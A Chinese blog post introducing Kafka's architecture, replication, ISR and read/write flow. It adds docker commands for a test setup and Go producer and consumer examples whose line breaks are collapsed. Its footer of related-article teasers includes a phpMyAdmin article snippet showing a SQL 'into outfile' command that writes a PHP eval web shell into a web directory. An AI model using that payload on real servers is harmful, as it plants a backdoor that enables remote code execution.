golang—kafka架构原理快速入门以及自测环境搭建(docker单节点部署)

kafka

Apache Kafka 是一个分布式的流处理平台。它具有以下特点:

  • 支持消息的发布和订阅,类似于 RabbtMQ、ActiveMQ 等消息队列
  • 支持数据实时处理
  • 能保证消息的可靠性投递
  • 支持消息的持久化存储,并通过多副本分布式的存储方案来保证消息的容错
  • 高吞吐率,单 Broker 可以轻松处理数千个分区以及每秒百万级的消息量

架构简介

在这里插入图片描述

Messages and Batches

kafka基本数据单元为消息,为了提高网络使用效率,采用批写入方式

Topics and Partitions

topic为kafka消费主题,每个主题下有若干分区(partitions),Kafka 通过分区来实现数据的冗余和伸缩性,分区可以分布在不同的服务器上。由于多个partition的特性,kafka无法保证topic范围内的消息顺序,但是可以保证单个分区内消息的顺序

broker

broker 对应着一个 kafka 的进程;一个 kafka 集群会包含多个 broker;同时需要在这些 broker中选举出一个controller,选举是通过 zk 来实现;controller 负责协调管理集群状态,同时也负责 partition 的 leader 选举;

Producers And Consumers
  • 消息的生产者,负责将消息发送到不同的 partition 中;消息的生产需要考虑幂等性、正确性以及安全性;kafka 引入了 ack 机制;ack 为 0,则不需要 kafka 回复,此时可能造成数据丢失;ack为 1, 则需要等待 leader 回复,此时其他 replica 可能还没同步 leader 挂掉,数据安全性没法得到保证;ack 为 -1,则需要等待其他 replica 同步完成后,才回复,此时数据最健壮,但是效率最低;
  • 消息的消费者,负责消费消息;一个 partition 对应一个consumer, 而一个 consumer 可以对应多个 partition;消费同一类消息的高吞吐量,可以设置 consumer group;
副本同步策略

每个分区里有多个副本,这些副本有一个leader。只有副本全部同步完成才发送ack。这里指同步策略,是全量同步,而不是半数以上同步了就认为该数据已经commit。不过也可以设置最少同步副本数提高性能(min.insync.replicas)

ISR

Leader 维护了一个动态的 in-sync replica set (ISR),意为和 leader 保持同步的 follower 集合。当 ISR 中的 follower 完成数据的同步之后,leader 就会给 producer 发送 ack。如果 follower 长时间未向 leader 同步数据,则该 follower 将被踢出 ISR,该时间阈值由 replica.lag.time.max.ms 参数设定。Leader 发生故障之后,就会从 ISR 中选举新的 leader。

数据可见性

需要注意的是,并不是所有保存在分区首领上的数据都可以被客户端读取到,为了保证数据一致性,只有被所有同步副本 (ISR 中所有副本) 都保存了的数据才能被客户端读取到。
在这里插入图片描述

kafka读写机制

producer写流程

producer写入消息流程如下:

  • 连接ZK集群,从ZK中拿到对应topic的partition信息和partition的Leader的相关信息

  • 连接到对应Leader对应的broker

  • 将消息按批次发送到partition的Leader上

  • 其他Follower从Leader上复制数据

  • 依次返回ACK

  • 直到所有ISR中的数据写完成,才完成提交,整个写过程结束
    在这里插入图片描述

consumer 读流程
  • 连接ZK集群,从ZK中拿到对应topic的partition信息和partition的Leader的相关信息

  • 连接到对应Leader对应的broker

  • consumer将自己保存的offset发送给Leader

  • Leader根据offset等信息定位到segment(索引文件和日志文件)

  • 根据索引文件中的内容,定位到日志文件中该偏移量对应的开始位置读取相应长度的数据并返回给consumer

kafka集群选举

副本leader选举

只有完全追上Leader数据的follower才能进行选举,Leader发生故障之后,会从ISR中选出一个新的Leader

controller选举

这部分由ZK完成,不过高本版kafka引入kratf,就可以完成去ZK化了。 ratf是一种简单易理解并且严格复合数学归纳的共识算法。

自测环境搭建

zk

docker pull wurstmeister/zookeeper
docker run -itd --name zookeeper -p 2181:2181 wurstmeister/zookeeper

kafka

 docker pull wurstmeister/kafkadocker run -itd --name kafka -p 9092:9092 -e HOST_IP=10.74.18.61 -e KAFKA_ADVERTISED_PORT=9092 -e KAFKA_ZOOKEEPER_CONNECT=zookeeper:2181 -e KAFKA_ADVERTISED_HOST_NAME=10.74.18.61 --link zookeeper:zookeeper wurstmeister/kafka

go链接kafka生产消费

go版本:1.21
生产者

package mainimport ("fmt""github.com/IBM/sarama"
)func main() {config := sarama.NewConfig()// 等待服务器所有副本都保存成功后的响应,对应ack=-1config.Producer.RequiredAcks = sarama.WaitForAll// 随机的分区类型:返回一个分区器,该分区器每次选择一个随机分区config.Producer.Partitioner = sarama.NewRandomPartitioner// 是否等待成功和失败后的响应config.Producer.Return.Successes = true// 使用给定代理地址和配置创建一个同步生产者producer, err := sarama.NewSyncProducer([]string{"10.74.18.61:9092"}, config)if err != nil {panic(err)}defer producer.Close()//构建发送的消息,msg := &sarama.ProducerMessage{//Topic: "test",//包含了消息的主题Partition: int32(10),                   //Key:       sarama.StringEncoder("key"), //}var value stringvar msgType stringfor {_, err := fmt.Scanf("%s", &value)if err != nil {break}fmt.Scanf("%s", &msgType)fmt.Println("msgType = ", msgType, ",value = ", value)msg.Topic = msgType//将字符串转换为字节数组msg.Value = sarama.ByteEncoder(value)//fmt.Println(value)//SendMessage:该方法是生产者生产给定的消息//生产成功的时候返回该消息的分区和所在的偏移量//生产失败的时候返回errorpartition, offset, err := producer.SendMessage(msg)if err != nil {fmt.Println("Send message Fail", err)}fmt.Printf("Partition = %d, offset=%d\n", partition, offset)}
}

消费者

package mainimport ("fmt""sync""github.com/IBM/sarama"
)var (wg sync.WaitGroup
)func main() {// 根据给定的代理地址和配置创建一个消费者consumer, err := sarama.NewConsumer([]string{"10.74.18.61:9092"}, nil)if err != nil {panic(err)}//Partitions(topic):该方法返回了该topic的所有分区idpartitionList, err := consumer.Partitions("test")if err != nil {panic(err)}for partition := range partitionList {//ConsumePartition方法根据主题,分区和给定的偏移量创建创建了相应的分区消费者//如果该分区消费者已经消费了该信息将会返回error//sarama.OffsetNewest:表明了为最新消息pc, err := consumer.ConsumePartition("test", int32(partition), sarama.OffsetNewest)if err != nil {panic(err)}defer pc.AsyncClose()wg.Add(1)go func(sarama.PartitionConsumer) {defer wg.Done()//Messages()该方法返回一个消费消息类型的只读通道,由代理产生for msg := range pc.Messages() {fmt.Printf("%s---Partition:%d, Offset:%d, Key:%s, Value:%s\n", msg.Topic, msg.Partition, msg.Offset, string(msg.Key), string(msg.Value))}}(pc)}wg.Wait()consumer.Close()
}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/183699.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java中xml映射文件是干什么的

Java中的XML映射文件主要用于将Java对象与XML文档之间进行转换。它通常用于处理数据交换和存储,例如将Java对象转换为XML格式以便在网络上传输或保存到文件中,或者将XML文档解析为Java对象以进行处理。这种转换可以通过Java的JAXB(Java Archi…

springMVC实验(二)—调式工具APIFOX的使用

【知识要点】 后端开发调试工具 前后端分离已经成为互联网类软件开发主流模式,没有前端操作的支持,如何调试后端程序的就是开发人员必须解决的问题。如:get类请求可以直接使用浏览器就能模拟测试,但是post、put等类型的请求&…

Ubuntu 环境下 NFS 服务安装及配置使用

需求:公司内部有多台物理服务器,需要A服务器上的文件让B服务器访问,也就是两台服务器共享文件,当然也可以对A服务器上的文件做权限管理,让B服务器只读或者可读可写 1、NFS 介绍 NFS 是 Network FileSystem 的缩写&…

可以在电脑桌面展示工作计划表的软件

很多上班族都表示自己在工作时,会面临大量且复杂的工作任务,这时候就会拖延工作,或者感觉时间不够用,所以需要有明确的工作计划来指导自己如何分类时间和精力,确保每项工作任务都能够按时完成。如果需要制定每天的工作…

C++学习之路(十二)C++ 用Qt5实现一个工具箱(增加一个XML文本格式化功能)- 示例代码拆分讲解

上篇文章,我们用 Qt5 实现了在小工具箱中添加了《进制转换器功能》功能。为了继续丰富我们的工具箱,今天我们就再增加一个平时经常用到的功能吧,就是「 XML文本格式化 」功能。下面我们就来看看如何来规划开发一个这样的小功能并且添加到我们…

模拟算法【1】

文章目录 😀1576. 替换所有的问号😆题目🤩算法原理🙂代码实现 😊495.提莫攻击🫠题目😉算法原理🤗代码实现 模拟算法 通俗的来说,模拟算法就是依葫芦画瓢,将题…

React 签字手写签名组件 react-signature

安装依赖包 npm install uiw/react-signature示例代码 import React, { useRef } from "react"; import Signature from uiw/react-signature;export default function App() {const $svg useRef(null);const handle (evn) > $svg.current?.clear();return (…

[ISCTF2023] Crypto/PWN/Reverse

最近新生赛还挺多,不过这个开始后注册页面就被删了,没注册上。拿别人的附件作了下。 Crypto 七七的欧拉 这题只给了n,e,c这种情况一般正常没法解,猜n不正常 import gmpy2 import libnum from crypto.Util.number import *flagbISCTF{****…

【C/C++笔试练习】this指针的概念、初始化列表、const对象调用、构造和析构函数、继承和组合、重载和多态、虚函数的定义、计算日期到天数转换、幸运的袋子

文章目录 C/C笔试练习选择部分(1)this指针的概念(2)初始化列表(3)const对象调用(4)构造和析构函数(5)继承和组合(6)重载和多态&#x…

7Docker搭建es和kibana

一、安装es 1.拉取镜像 sudo docker pull elasticsearch:7.12.0 elasticsearch:7.12.0:我安装的版本是7.12.0,可以根据实际的情况安装 创建docker容器挂在的目录: sudo mkdir -p /opt/elasticsearch/config sudo mkdir -p /opt/elasticsearch/data s…

TA-Lib学习研究笔记(一)

TA-Lib学习研究笔记(一) 1.介绍 TA-Lib,英文全称“Technical Analysis Library”,是一个用于金融量化的第三方库,涵盖了150多种交易软件中常用的技术分析指标,如RSI,KDJ,MACD, MACDEXT, MACDFIX, SAR, SAREXT, MA,SM…

nacos配置变更导致logback日志异常

问题背景: 线上的服务突然内存爆满,查服务器突然发现,日志全部打印到了/tmp/tomcat.xxx.port目录下,后来对应操作时间,和nacos修改配置是同一时间发生的,但是疑惑的点是,nacos配置变更为什么会引起logback的…

OpenMMlab导出FCN模型并用onnxruntime推理

导出onnx文件 直接使用脚本 import torch from mmseg.apis init_modelconfig_file configs/fcn/fcn_r18-d8_4xb2-80k_cityscapes-512x1024.py checkpoint_file fcn_r18-d8_512x1024_80k_cityscapes_20201225_021327-6c50f8b4.pth model init_model(config_file, checkpoin…

基于Java SSM框架实现高校二手交易平台系统项目【项目源码+论文说明】

基于java的SSM框架实现高校二手交易平台系统演示 摘要 本论文主要论述了如何使用JAVA语言开发一个高校二手交易平台,本系统将严格按照软件开发流程进行各个阶段的工作,采用B/S架构,面向对象编程思想进行项目开发。在引言中,作者将…

数据清洗和特征工程的关系是什么?有什么区别?

1.数据清洗独立于特征工程 数据清洗是独立于特征工程的:一方面,数据清洗不仅适用于机器学习项目,也适用于一般的数据统计分析过程,而特征工程仅适用于机器学习项目;另一方面,针对机器学习项目,…

001 - 安装Qt并配置环境

进入Qt中文网站的下载界面 👉点此进入 点进去之后,你会看到如下界面: 这里下载的是Qt开源版的在线安装器, 如果你觉得下载速度很慢,可以挂个梯子。双击打开: 因为是在线安装,所以你需要输入电子…

【Web安全】拿到phpMyAdmin如何获取权限

文章目录 1、outfile写一句话2、general_log_file写一句话 通过弱口令拿到进到phpMyAdmin页面如何才能获取权限 1、outfile写一句话 尝试执行outfile语句写入一句话木马 select "<?php eval($_REQUEST[6868])?>" into outfile "C:\\phpStudy\\WWW\\p…

数据结构day4作业

1.单链表任意位置删除 datetype pos;printf("please input pos");scanf("%d",&pos);headdelete_all(head,pos);Output(head);Linklist delete_all(Linklist head,datetype pos) {if(pos<1||pos>length(head)||headNULL)return head;if(head->…

Web安全漏洞分析-XSS(上)

随着互联网的迅猛发展&#xff0c;Web应用的普及程度也愈发广泛。然而&#xff0c;随之而来的是各种安全威胁的不断涌现&#xff0c;其中最为常见而危险的之一就是跨站脚本攻击&#xff08;Cross-Site Scripting&#xff0c;简称XSS&#xff09;。XSS攻击一直以来都是Web安全领…

万界星空科技/仓库管理WMS系统/免费仓库管理系统

仓库管理&#xff08;仓储管理&#xff09;&#xff0c;指对仓库及仓库内部的物资进行收发、结存等有效控制和管理&#xff0c;确保仓储货物的完好无损&#xff0c;保证生产经营活动的正常进行&#xff0c;在此基础上对货物进行分类记录&#xff0c;通过报表分析展示仓库状态、…